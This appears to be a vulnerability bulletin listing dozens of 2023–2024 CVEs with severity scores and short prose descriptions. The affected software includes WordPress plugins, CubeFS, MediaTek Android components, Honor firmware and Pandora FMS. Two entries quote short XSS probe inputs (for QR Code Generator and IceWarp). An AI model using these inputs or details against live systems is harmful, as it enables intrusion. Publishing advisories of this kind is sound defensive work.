wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in impleCode Product Catalog Simple. This issue affects Product Catalog Simple through 1.7.6. 2023-12-29 7.5 CVE-2023-51687
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in impleCode eCommerce Product Catalog Plugin for WordPress. This issue affects eCommerce Product Catalog Plugin for WordPress through 3.3.26. 2023-12-29 7.5 CVE-2023-51688
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WP Zinc Page Generator. This issue affects Page Generator through 1.7.1. 2023-12-31 7.2 CVE-2023-52131
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Jewel Theme WP Adminify. This issue affects WP Adminify through 3.1.6. 2023-12-31 7.2 CVE-2023-52132
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Eyal Fitoussi GEO my WordPress. This issue affects GEO my WordPress through 4.0.2. 2023-12-31 7.2 CVE-2023-52134
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WS Form WS Form LITE – Drag & Drop Contact Form Builder for WordPress. This issue affects WS Form LITE – Drag & Drop Contact Form Builder for WordPress through 1.9.170. 2023-12-29 7.2 CVE-2023-52135
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Naa986 WP Stripe Checkout. This issue affects WP Stripe Checkout through 1.2.2.37. 2024-01-05 7.5 CVE-2023-52143
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Really Simple Plugins Recipe Maker For Your Food Blog from Zip Recipes. This issue affects Recipe Maker For Your Food Blog from Zip Recipes through 8.1.0. 2023-12-31 7.6 CVE-2023-52180
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Everestthemes Everest Backup – WordPress Cloud Backup, Migration, Restore & Cloning Plugin. This issue affects Everest Backup – WordPress Cloud Backup, Migration, Restore & Cloning Plugin through 2.1.9. 2023-12-31 7.5 CVE-2023-52185
audit@patchstack.com
wordpress — wordpress The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘device’ header in all versions up to, and including, 2.8.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-03 7.2 CVE-2023-7027
security@wordfence.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in YITH YITH WooCommerce Product Add-Ons. This issue affects YITH WooCommerce Product Add-Ons through 4.3.0. 2023-12-31 9.1 CVE-2023-49777
audit@patchstack.com
xnview — xnview_classic XnView Classic before 2.51.3 on Windows has a Write Access Violation at xnview.exe+0x3ADBD0. 2023-12-29 9.8 CVE-2023-52173
cve@mitre.org
xnview — xnview_classic XnView Classic before 2.51.3 on Windows has a Write Access Violation at xnview.exe+0x3125D6. 2023-12-29 9.8 CVE-2023-52174
cve@mitre.org
yaztek_software_technologies_and_computer_systems — e-commerce_software Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Yaztek Software Technologies and Computer Systems E-Commerce Software allows SQL Injection. This issue affects E-Commerce Software: through 20231229. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-29 9.8 CVE-2023-4674
iletisim@usom.gov.tr
zzcms — zzcms ZZCMS 2023 has a file upload vulnerability in 3/E_bak5.1/upload/index.php, allowing attackers to exploit this loophole to gain server privileges and execute arbitrary code. 2023-12-29 9.8 CVE-2023-50104
cve@mitre.org

Medium Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
antisamy-dotnet — antisamy-dotnet OWASP AntiSamy .NET is a library for performing cleansing of HTML coming from untrusted sources. Prior to version 1.2.0, there is a potential for a mutation cross-site scripting (mXSS) vulnerability in AntiSamy caused by flawed parsing of the HTML being sanitized. To be subject to this vulnerability the `preserveComments` directive must be enabled in your policy file and also allow for certain tags at the same time. As a result, certain crafty inputs can result in elements in comment tags being interpreted as executable when using AntiSamy’s sanitized output. This is patched in OWASP AntiSamy .NET 1.2.0 and later. See important remediation details in the reference given below. As a workaround, manually edit the AntiSamy policy file (e.g., antisamy.xml) by deleting the `preserveComments` directive or setting its value to `false`, if present. Also, it would be useful to make AntiSamy remove the `noscript` tag by adding a line described in the GitHub Security Advisory to the tag definitions under the `` node or deleting it entirely if present. As the previously mentioned policy settings are preconditions for the mXSS attack to work, changing them as recommended should be sufficient to protect you against this vulnerability when using a vulnerable version of this library. However, the existing bug would still be present in AntiSamy or its parser dependency (HtmlAgilityPack). The safety of this workaround relies on configurations that may change in the future and don’t address the root cause of the vulnerability. As such, it is strongly recommended to upgrade to a fixed version of AntiSamy. 2024-01-02 6.1 CVE-2023-51652
security-advisories@github.com
campcodes — online_college_library_system A vulnerability was found in Campcodes Online College Library System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/borrow_add.php of the component HTTP POST Request Handler. The manipulation of the argument student leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249362 is the identifier assigned to this vulnerability. 2023-12-30 4.7 CVE-2023-7175
cna@vuldb.com
cloudflare,_inc. — wrangler Sending specially crafted HTTP requests and inspector messages to Wrangler’s dev server could result in any file on the user’s computer being accessible over the local network. An attacker that could trick any user on the local network into opening a malicious website could also read any file. 2023-12-29 5.7 CVE-2023-7079
cna@cloudflare.com
cloudflare,_inc. — zlib Cloudflare version of zlib library was found to be vulnerable to memory corruption issues affecting the deflation algorithm implementation (deflate.c). The issues resulted from improper input validation and heap-based buffer overflow. A local attacker could exploit the problem during compression using a crafted malicious file potentially leading to denial of service of the software. Patches: The issue has been patched in commit 8352d10 https://github.com/cloudflare/zlib/commit/8352d108c05db1bdc5ac3bdf834dad641694c13c . The upstream repository is not affected. 2024-01-04 4 CVE-2023-6992
cna@cloudflare.com
code-projects — client_details_system A vulnerability was found in code-projects Client Details System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/regester.php. The manipulation of the argument fname/lname/email/contact leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249146 is the identifier assigned to this vulnerability. 2023-12-29 4.8 CVE-2023-7143
cna@vuldb.com
code-projects — qr_code_generator A vulnerability was found in code-projects QR Code Generator 1.0. It has been classified as problematic. This affects an unknown part of the file /download.php?file=author.png. The manipulation of the argument file with the input “> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249153 was assigned to this vulnerability. 2023-12-29 6.1 CVE-2023-7149
cna@vuldb.com
codeastro — internet_banking_system A vulnerability, which was classified as critical, has been found in CodeAstro Internet Banking System up to 1.0. This issue affects some unknown processing of the file pages_account.php of the component Profile Picture Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249509 was assigned to this vulnerability. 2024-01-02 6.3 CVE-2024-0194
cna@vuldb.com
craft_cms — craft_cms Craft is a content management system. This is a potential moderate impact, low complexity privilege escalation vulnerability in Craft starting in 3.x prior to 3.9.6 and 4.x prior to 4.4.16 with certain user permissions setups. This has been fixed in Craft 4.4.16 and Craft 3.9.6. Users should ensure they are running at least those versions. 2024-01-03 5.4 CVE-2024-21622
security-advisories@github.com
cubefs — cubefs CubeFS is an open-source cloud-native file storage system. A security vulnerability was found in CubeFS HandlerNode in versions prior to 3.3.1 that could allow authenticated users to send maliciously crafted requests that would crash the ObjectNode and deny other users from using it. The root cause was improper handling of incoming HTTP requests that could allow an attacker to control the amount of memory that the ObjectNode would allocate. A malicious request could make the ObjectNode allocate more memory than the machine had available, and the attacker could exhaust memory by way of a single malicious request. An attacker would need to be authenticated in order to invoke the vulnerable code with their malicious request and have permissions to delete objects. In addition, the attacker would need to know the names of existing buckets of the CubeFS deployment – otherwise the request would be rejected before it reached the vulnerable code. As such, the most likely attacker is an inside user or an attacker that has breached the account of an existing user in the cluster. The issue has been patched in v3.3.1. There is no other mitigation besides upgrading. 2024-01-03 6.5 CVE-2023-46738
security-advisories@github.com
cubefs — cubefs CubeFS is an open-source cloud-native file storage system. A vulnerability was found in the CubeFS master component in versions prior to 3.3.1 that could allow an untrusted attacker to steal user passwords by carrying out a timing attack. The root cause of the vulnerability was that CubeFS used raw string comparison of passwords. The vulnerable part of CubeFS was the UserService of the master component. The UserService gets instantiated when starting the server of the master component. The issue has been patched in v3.3.1. For impacted users, there is no other way to mitigate the issue besides upgrading. 2024-01-03 6.5 CVE-2023-46739
security-advisories@github.com
cubefs — cubefs CubeFS is an open-source cloud-native file storage system. Prior to version 3.3.1, CubeFS used an insecure random string generator to generate user-specific, sensitive keys used to authenticate users in a CubeFS deployment. This could allow an attacker to predict and/or guess the generated string and impersonate a user thereby obtaining higher privileges. When CubeFS creates new users, it creates a piece of sensitive information for the user called the “accessKey”. To create the “accessKey”, CubeFS uses an insecure string generator which makes it easy to guess and thereby impersonate the created user. An attacker could leverage the predictable random string generator and guess a user’s access key and impersonate the user to obtain higher privileges. The issue has been fixed in v3.3.1. There is no other mitigation than to upgrade. 2024-01-03 6.5 CVE-2023-46740
security-advisories@github.com
cubefs — cubefs CubeFS is an open-source cloud-native file storage system. A vulnerability was found in CubeFS prior to version 3.3.1 that could allow users to read sensitive data from the logs which could allow them to escalate privileges. CubeFS leaks configuration keys in plaintext format in the logs. These keys could allow anyone to carry out operations on blobs that they otherwise do not have permissions for. For example, an attacker that has successfully retrieved a secret key from the logs can delete blobs from the blob store. The attacker can either be an internal user with limited privileges to read the log, or they can be an external user who has escalated privileges sufficiently to access the logs. The vulnerability has been patched in v3.3.1. There is no other mitigation than upgrading. 2024-01-03 4.8 CVE-2023-46741
security-advisories@github.com
cubefs — cubefs CubeFS is an open-source cloud-native file storage system. CubeFS prior to version 3.3.1 was found to leak user’s secret keys and access keys in the logs in multiple components. When CubeFS creates new users, it leaks the user’s secret key. This could allow a lower-privileged user with access to the logs to retrieve sensitive information and impersonate other users with higher privileges than themselves. The issue has been patched in v3.3.1. There is no other mitigation than upgrading CubeFS. 2024-01-03 4.8 CVE-2023-46742
security-advisories@github.com
google — android In keyInstall, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308607; Issue ID: ALPS08308607. 2024-01-02 6.7 CVE-2023-32872
security@mediatek.com
google — android In battery, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08308070. 2024-01-02 6.7 CVE-2023-32877
security@mediatek.com
google — android In battery, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08308064. 2024-01-02 6.7 CVE-2023-32879
security@mediatek.com
google — android In battery, there is a possible memory corruption due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08308616. 2024-01-02 6.7 CVE-2023-32882
security@mediatek.com
google — android In Engineer Mode, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08282249; Issue ID: ALPS08282249. 2024-01-02 6.7 CVE-2023-32883
security@mediatek.com
google — android In netdagent, there is a possible information disclosure due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07944011; Issue ID: ALPS07944011. 2024-01-02 6.7 CVE-2023-32884
security@mediatek.com
google — android In display drm, there is a possible memory corruption due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07780685; Issue ID: ALPS07780685. 2024-01-02 6.7 CVE-2023-32885
security@mediatek.com
google — android In bluetooth service, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07933038; Issue ID: MSV-559. 2024-01-02 6.7 CVE-2023-32891
security@mediatek.com
google — android In keyInstall, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308607; Issue ID: ALPS08304217. 2024-01-02 4.4 CVE-2023-32875
security@mediatek.com
google — android In keyInstall, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308612; Issue ID: ALPS08308612. 2024-01-02 4.4 CVE-2023-32876
security@mediatek.com
google — android In battery, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08307992. 2024-01-02 4.4 CVE-2023-32878
security@mediatek.com
google — android In battery, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08308076. 2024-01-02 4.4 CVE-2023-32880
security@mediatek.com
google — android In battery, there is a possible information disclosure due to an integer overflow. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08308080. 2024-01-02 4.4 CVE-2023-32881
security@mediatek.com
hail — hail Hail is an open-source, general-purpose, Python-based data analysis tool with additional data types and methods for working with genomic data. Hail relies on OpenID Connect (OIDC) email addresses from ID tokens to verify the validity of a user’s domain, but because users have the ability to change their email address, they could create accounts and use resources in clusters that they should not have access to. For example, a user could create a Microsoft or Google account and then change their email to `test@example.org`. This account can then be used to create a Hail Batch account in Hail Batch clusters whose organization domain is `example.org`. The attacker is not able to access private data or impersonate another user, but they would have the ability to run jobs if Hail Batch billing projects are enabled and create Azure Tenants if they have Azure Active Directory Administrator access. 2023-12-29 5.3 CVE-2023-51663
security-advisories@github.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by improper access control (Unauthenticated File Download) vulnerability. An unauthenticated user can download certain files. 2024-01-03 5.4 CVE-2023-50344
psirt@hcl.com
hihonor — fri-an00_firmware Some Honor products are affected by file writing vulnerability, successful exploitation could cause information disclosure. 2023-12-29 5.5 CVE-2023-23426
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — honorboardapp Some Honor products are affected by information leak vulnerability; successful exploitation could cause the information leak. 2023-12-29 5.5 CVE-2023-23434
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — lge-an00_firmware Some Honor products are affected by incorrect privilege assignment vulnerability; successful exploitation could cause device service exceptions. 2023-12-29 5.5 CVE-2023-23438
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — lge-an00_firmware Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. 2023-12-29 5.5 CVE-2023-23439
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — lge-an00_firmware Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. 2023-12-29 5.5 CVE-2023-23440
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability; successful exploitation could cause information leak. 2023-12-29 5.5 CVE-2023-51429
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_ui Some Honor products are affected by out of bounds read vulnerability, successful exploitation could cause information leak. 2023-12-29 5.5 CVE-2023-23441
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_ui Some Honor products are affected by incorrect privilege assignment vulnerability; successful exploitation could cause information leak. 2023-12-29 5.5 CVE-2023-51430
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_ui Some Honor products are affected by out of bounds read vulnerability, successful exploitation could cause information leak. 2023-12-29 5.5 CVE-2023-51432
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_ui Some Honor products are affected by incorrect privilege assignment vulnerability; successful exploitation could cause information leak. 2023-12-29 5.5 CVE-2023-51433
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_ui Some Honor products are affected by type confusion vulnerability; successful exploitation could cause denial of service. 2023-12-29 5.5 CVE-2023-6939
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — phoneservice Some Honor products are affected by incorrect privilege assignment vulnerability; successful exploitation could cause device service exceptions. 2023-12-29 5.5 CVE-2023-51431
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — vmall Some Honor products are affected by information leak vulnerability; successful exploitation could cause the information leak 2023-12-29 5.5 CVE-2023-23437
3836d913-7555-4dd0-a509-f5667fdf5fe4
hitachi_energy — multiple_products A vulnerability exists in the Relion update package signature validation. A tampered update package could cause the IED to restart. After restart the device is back to normal operation. An attacker could exploit the vulnerability by first gaining access to the system with security privileges and attempt to update the IED with a malicious update package. Successful exploitation of this vulnerability will cause the IED to restart, causing a temporary Denial of Service. 2024-01-04 4.5 CVE-2022-3864
cybersecurity@hitachienergy.com
hospital_management_system — hospital_management_system A vulnerability, which was classified as problematic, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file registration.php. The manipulation of the argument First Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249357 was assigned to this vulnerability. 2023-12-30 4.3 CVE-2023-7173
cna@vuldb.com
icewarp — icewarp A vulnerability classified as problematic has been found in IceWarp 12.0.2.1/12.0.3.1. This affects an unknown part of the file /install/ of the component Utility Download Handler. The manipulation of the argument lang with the input 1%27″()%26%25 leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249759. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-05 4.3 CVE-2024-0246
cna@vuldb.com
ipaddress — ipaddress An issue in the component IPAddressBitsDivision of IPAddress v5.1.0 leads to an infinite loop. 2023-12-29 5.5 CVE-2023-50570
cve@mitre.org
jline — jline An issue in the component GroovyEngine.execute of jline-groovy v3.24.1 allows attackers to cause an OOM (OutofMemory) error. 2023-12-29 5.5 CVE-2023-50572
cve@mitre.org
kernelsu — kernelsu KernelSU is a Kernel-based root solution for Android devices. In versions 0.7.1 and prior, the logic of get apk path in KernelSU kernel module can be bypassed, which causes any malicious apk named `me.weishu.kernelsu` to get root permission. If a device with a KernelSU module installed tries to install any unchecked apk whose package name equals that of the official KernelSU Manager, that apk can take over root privileges on the device. As of time of publication, a patched version is not available. 2024-01-02 6.7 CVE-2023-49794
security-advisories@github.com
kruise — kruise Kruise provides automated management of large-scale applications on Kubernetes. Starting in version 0.8.0 and prior to versions 1.3.1, 1.4.1, and 1.5.2, an attacker who has gained root privilege of the node that kruise-daemon run can leverage the kruise-daemon pod to list all secrets in the entire cluster. After that, the attacker can leverage the “captured” secrets (e.g. the kruise-manager service account token) to gain extra privileges such as pod modification. Versions 1.3.1, 1.4.1, and 1.5.2 fix this issue. A workaround is available. For users that do not require imagepulljob functions, they can modify kruise-daemon-role to drop the cluster level secret get/list privilege. 2024-01-03 6.5 CVE-2023-30617
security-advisories@github.com
lenovo — lenovo_browser_mobile A vulnerability was reported in the Lenovo Browser Mobile and Lenovo Browser HD Apps for Android that could allow an attacker to craft a payload that could result in the disclosure of sensitive information. 2024-01-03 6.5 CVE-2023-6540
psirt@lenovo.com
libredwg — libredwg Versions of the package libredwg before 0.12.5.6384 are vulnerable to Denial of Service (DoS) due to an out-of-bounds read involving section->num_pages in decode_r2007.c. 2024-01-02 5.5 CVE-2023-26157
report@snyk.io
linux — kernel A memory leak problem was found in ctnetlink_create_conntrack in net/netfilter/nf_conntrack_netlink.c in the Linux Kernel. This issue may allow a local attacker with CAP_NET_ADMIN privileges to cause a denial of service (DoS) attack due to a refcount overflow. 2024-01-02 6.1 CVE-2023-7192
secalert@redhat.com
logobee — logobee LogoBee 0.2 allows updates.php?id= XSS. 2023-12-30 6.1 CVE-2023-52257
cve@mitre.org
magic-api — magic-api A vulnerability has been found in Magic-Api up to 2.0.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /resource/file/api/save?auto=1. The manipulation leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249511. 2024-01-02 6.3 CVE-2024-0196
cna@vuldb.com
mattermost — mattermost Mattermost version 8.1.6 and earlier fails to sanitize channel mention data in posts, which allows an attacker to inject markup in the web client. 2023-12-29 6.1 CVE-2023-7113
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to properly verify the permissions needed for viewing archived public channels, allowing a member of one team to get details about the archived public channels of another team via the GET /api/v4/teams//channels/deleted endpoint. 2024-01-02 4.3 CVE-2023-47858
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to scope the WebSocket response around notified users to each user separately, resulting in the WebSocket broadcasting the information about who was notified about a post to everyone else in the channel. 2024-01-02 4.3 CVE-2023-48732
responsibledisclosure@mattermost.com
mdaemon — securitygateway MDaemon SecurityGateway through 9.0.3 allows XSS via a crafted Message Content Filtering rule. This might allow domain administrators to conduct attacks against global administrators. 2023-12-31 4.8 CVE-2023-52269
cve@mitre.org
mediatek — software_development_kit In wlan driver, there is a possible PIN crack due to use of insufficiently random values. This could lead to local information disclosure with no execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00325055; Issue ID: MSV-868. 2024-01-02 5.5 CVE-2023-32831
security@mediatek.com
moxa — oncell_g3150a-lte_series A clickjacking vulnerability has been identified in OnCell G3150A-LTE Series firmware versions v1.3 and prior. This vulnerability is caused by incorrectly restricting frame objects, which can lead to user confusion about which interface the user is interacting with. This vulnerability may lead the attacker to trick the user into interacting with the application. 2023-12-31 5.3 CVE-2023-6093
psirt@moxa.com
moxa — oncell_g3150a-lte_series A vulnerability has been identified in OnCell G3150A-LTE Series firmware versions v1.3 and prior. The vulnerability results from lack of protection for sensitive information during transmission. An attacker eavesdropping on the traffic between the web browser and server may obtain sensitive information. This type of attack could be executed to gather sensitive information or to facilitate a subsequent attack against the target. 2023-12-31 5.3 CVE-2023-6094
psirt@moxa.com
novel-plus — novel-plus A vulnerability classified as problematic has been found in Novel-Plus up to 4.2.0. This affects an unknown part of the file /user/updateUserInfo of the component HTTP POST Request Handler. The manipulation of the argument nickName leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is c62da9bb3a9b3603014d0edb436146512631100d. It is recommended to apply a patch to fix this issue. The identifier VDB-249201 was assigned to this vulnerability. 2023-12-29 5.4 CVE-2023-7166
cna@vuldb.com
novel-plus — novel-plus A vulnerability was found in Novel-Plus up to 4.2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file novel-admin/src/main/java/com/java2nb/novel/controller/FriendLinkController.java of the component Friendly Link Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The patch is named d6093d8182362422370d7eaf6c53afde9ee45215. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-249307. 2023-12-29 4.8 CVE-2023-7171
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file downloadable.php of the component Add Downloadable. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249505 was assigned to this vulnerability. 2024-01-02 6.3 CVE-2024-0192
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/uploads/. The manipulation leads to file and directory information exposure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249504. 2024-01-02 5.3 CVE-2024-0191
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been rated as critical. This issue affects some unknown processing of the file dasboard_teacher.php of the component Avatar Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249443. 2024-01-02 4.7 CVE-2024-0185
cna@vuldb.com
ocsinventory — ocsinventory OCSInventory allow stored email template with special characters that lead to a Stored cross-site Scripting. 2024-01-04 4.9 CVE-2023-3726
help@fluidattacks.com
openharmony — openharmony OpenHarmony v3.2.2 and prior versions allow a local attacker to cause DOS by occupying all resources. 2024-01-02 5.5 CVE-2023-47216
scy@openharmony.io
openharmony — openharmony OpenHarmony v3.2.2 and prior versions allow a local attacker to cause a multimedia camera crash by modifying a released pointer. 2024-01-02 5.5 CVE-2023-47857
scy@openharmony.io
openharmony — openharmony OpenHarmony v3.2.2 and prior versions allow a local attacker to cause a multimedia player crash by modifying a released pointer. 2024-01-02 5.5 CVE-2023-48360
scy@openharmony.io
openharmony — openharmony OpenHarmony v3.2.2 and prior versions allow a local attacker to cause a multimedia player crash by modifying a released pointer. 2024-01-02 5.5 CVE-2023-49135
scy@openharmony.io
openxiangshan — xiangshan An issue was discovered in XiangShan v2.1, allows local attackers to obtain sensitive information via the L1D cache. 2023-12-30 5.5 CVE-2023-50559
cve@mitre.org
own_health_record — own_health_record A vulnerability was found in MdAlAmin-aol Own Health Record 0.1-alpha/0.2-alpha/0.3-alpha/0.3.1-alpha. It has been rated as problematic. This issue affects some unknown processing of the file includes/logout.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. Upgrading to version 0.4-alpha is able to address this issue. The patch is named 58b413aa40820b49070782c786c526850ab7748f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-249191. 2023-12-30 4.3 CVE-2018-25096
cna@vuldb.com
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). Allows you to edit the Web Console user notification options. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 6.1 CVE-2023-41813
security@pandorafms.com
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). Through an HTML payload (iframe tag) it is possible to carry out XSS attacks when the user receiving the messages opens their notifications. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 6.1 CVE-2023-41814
security@pandorafms.com
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). Malicious code could be executed in the File Manager section. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 6.1 CVE-2023-41815
security@pandorafms.com
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). It was possible to execute malicious JS code on Visual Consoles. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 6.1 CVE-2023-44089
security@pandorafms.com
poly — multiple_products A vulnerability, which was classified as problematic, was found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. Affected is an unknown function of the component Configuration File Import. The manipulation of the argument device.auth.localAdminPassword leads to unverified password change. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249258 is the identifier assigned to this vulnerability. 2023-12-29 6.5 CVE-2023-4465
cna@vuldb.com
poly — multiple_products A vulnerability classified as problematic has been found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. This affects an unknown part of the component Web Configuration Application. The manipulation leads to insufficiently random values. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249255. 2023-12-29 5.9 CVE-2023-4462
cna@vuldb.com
nvd@nist.gov
poly — multiple_products A vulnerability has been found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Web Interface. The manipulation leads to protection mechanism failure. The attack can be launched remotely. The vendor explains that they do not regard this as a vulnerability as this is a feature that they offer to their customers who have a variety of environmental needs that are met through different firmware builds. To avoid potential roll-back attacks, they remove vulnerable builds from the public servers as a remediation effort. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249259. 2023-12-29 4.9 CVE-2023-4466
cna@vuldb.com
poly — trio_8800_firmware A vulnerability was found in Poly Trio 8800 7.2.6.0019 and classified as critical. Affected by this issue is some unknown functionality of the component Test Automation Mode. The manipulation leads to backdoor. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249260. 2023-12-29 6.6 CVE-2023-4467
cna@vuldb.com
prestashop — prestashop PrestaShop is an open-source e-commerce platform. Prior to version 8.1.3, the isCleanHtml method is not used on this form, which makes it possible to store a cross-site scripting payload in the database. The impact is low because the HTML is not interpreted in BO, thanks to twig’s escape mechanism. In FO, the cross-site scripting attack is effective, but only impacts the customer sending it, or the customer session from which it was sent. This issue affects those who have a module fetching these messages from the DB and displaying it without escaping HTML. Version 8.1.3 contains a patch for this issue. 2024-01-02 5.4 CVE-2024-21628
security-advisories@github.com
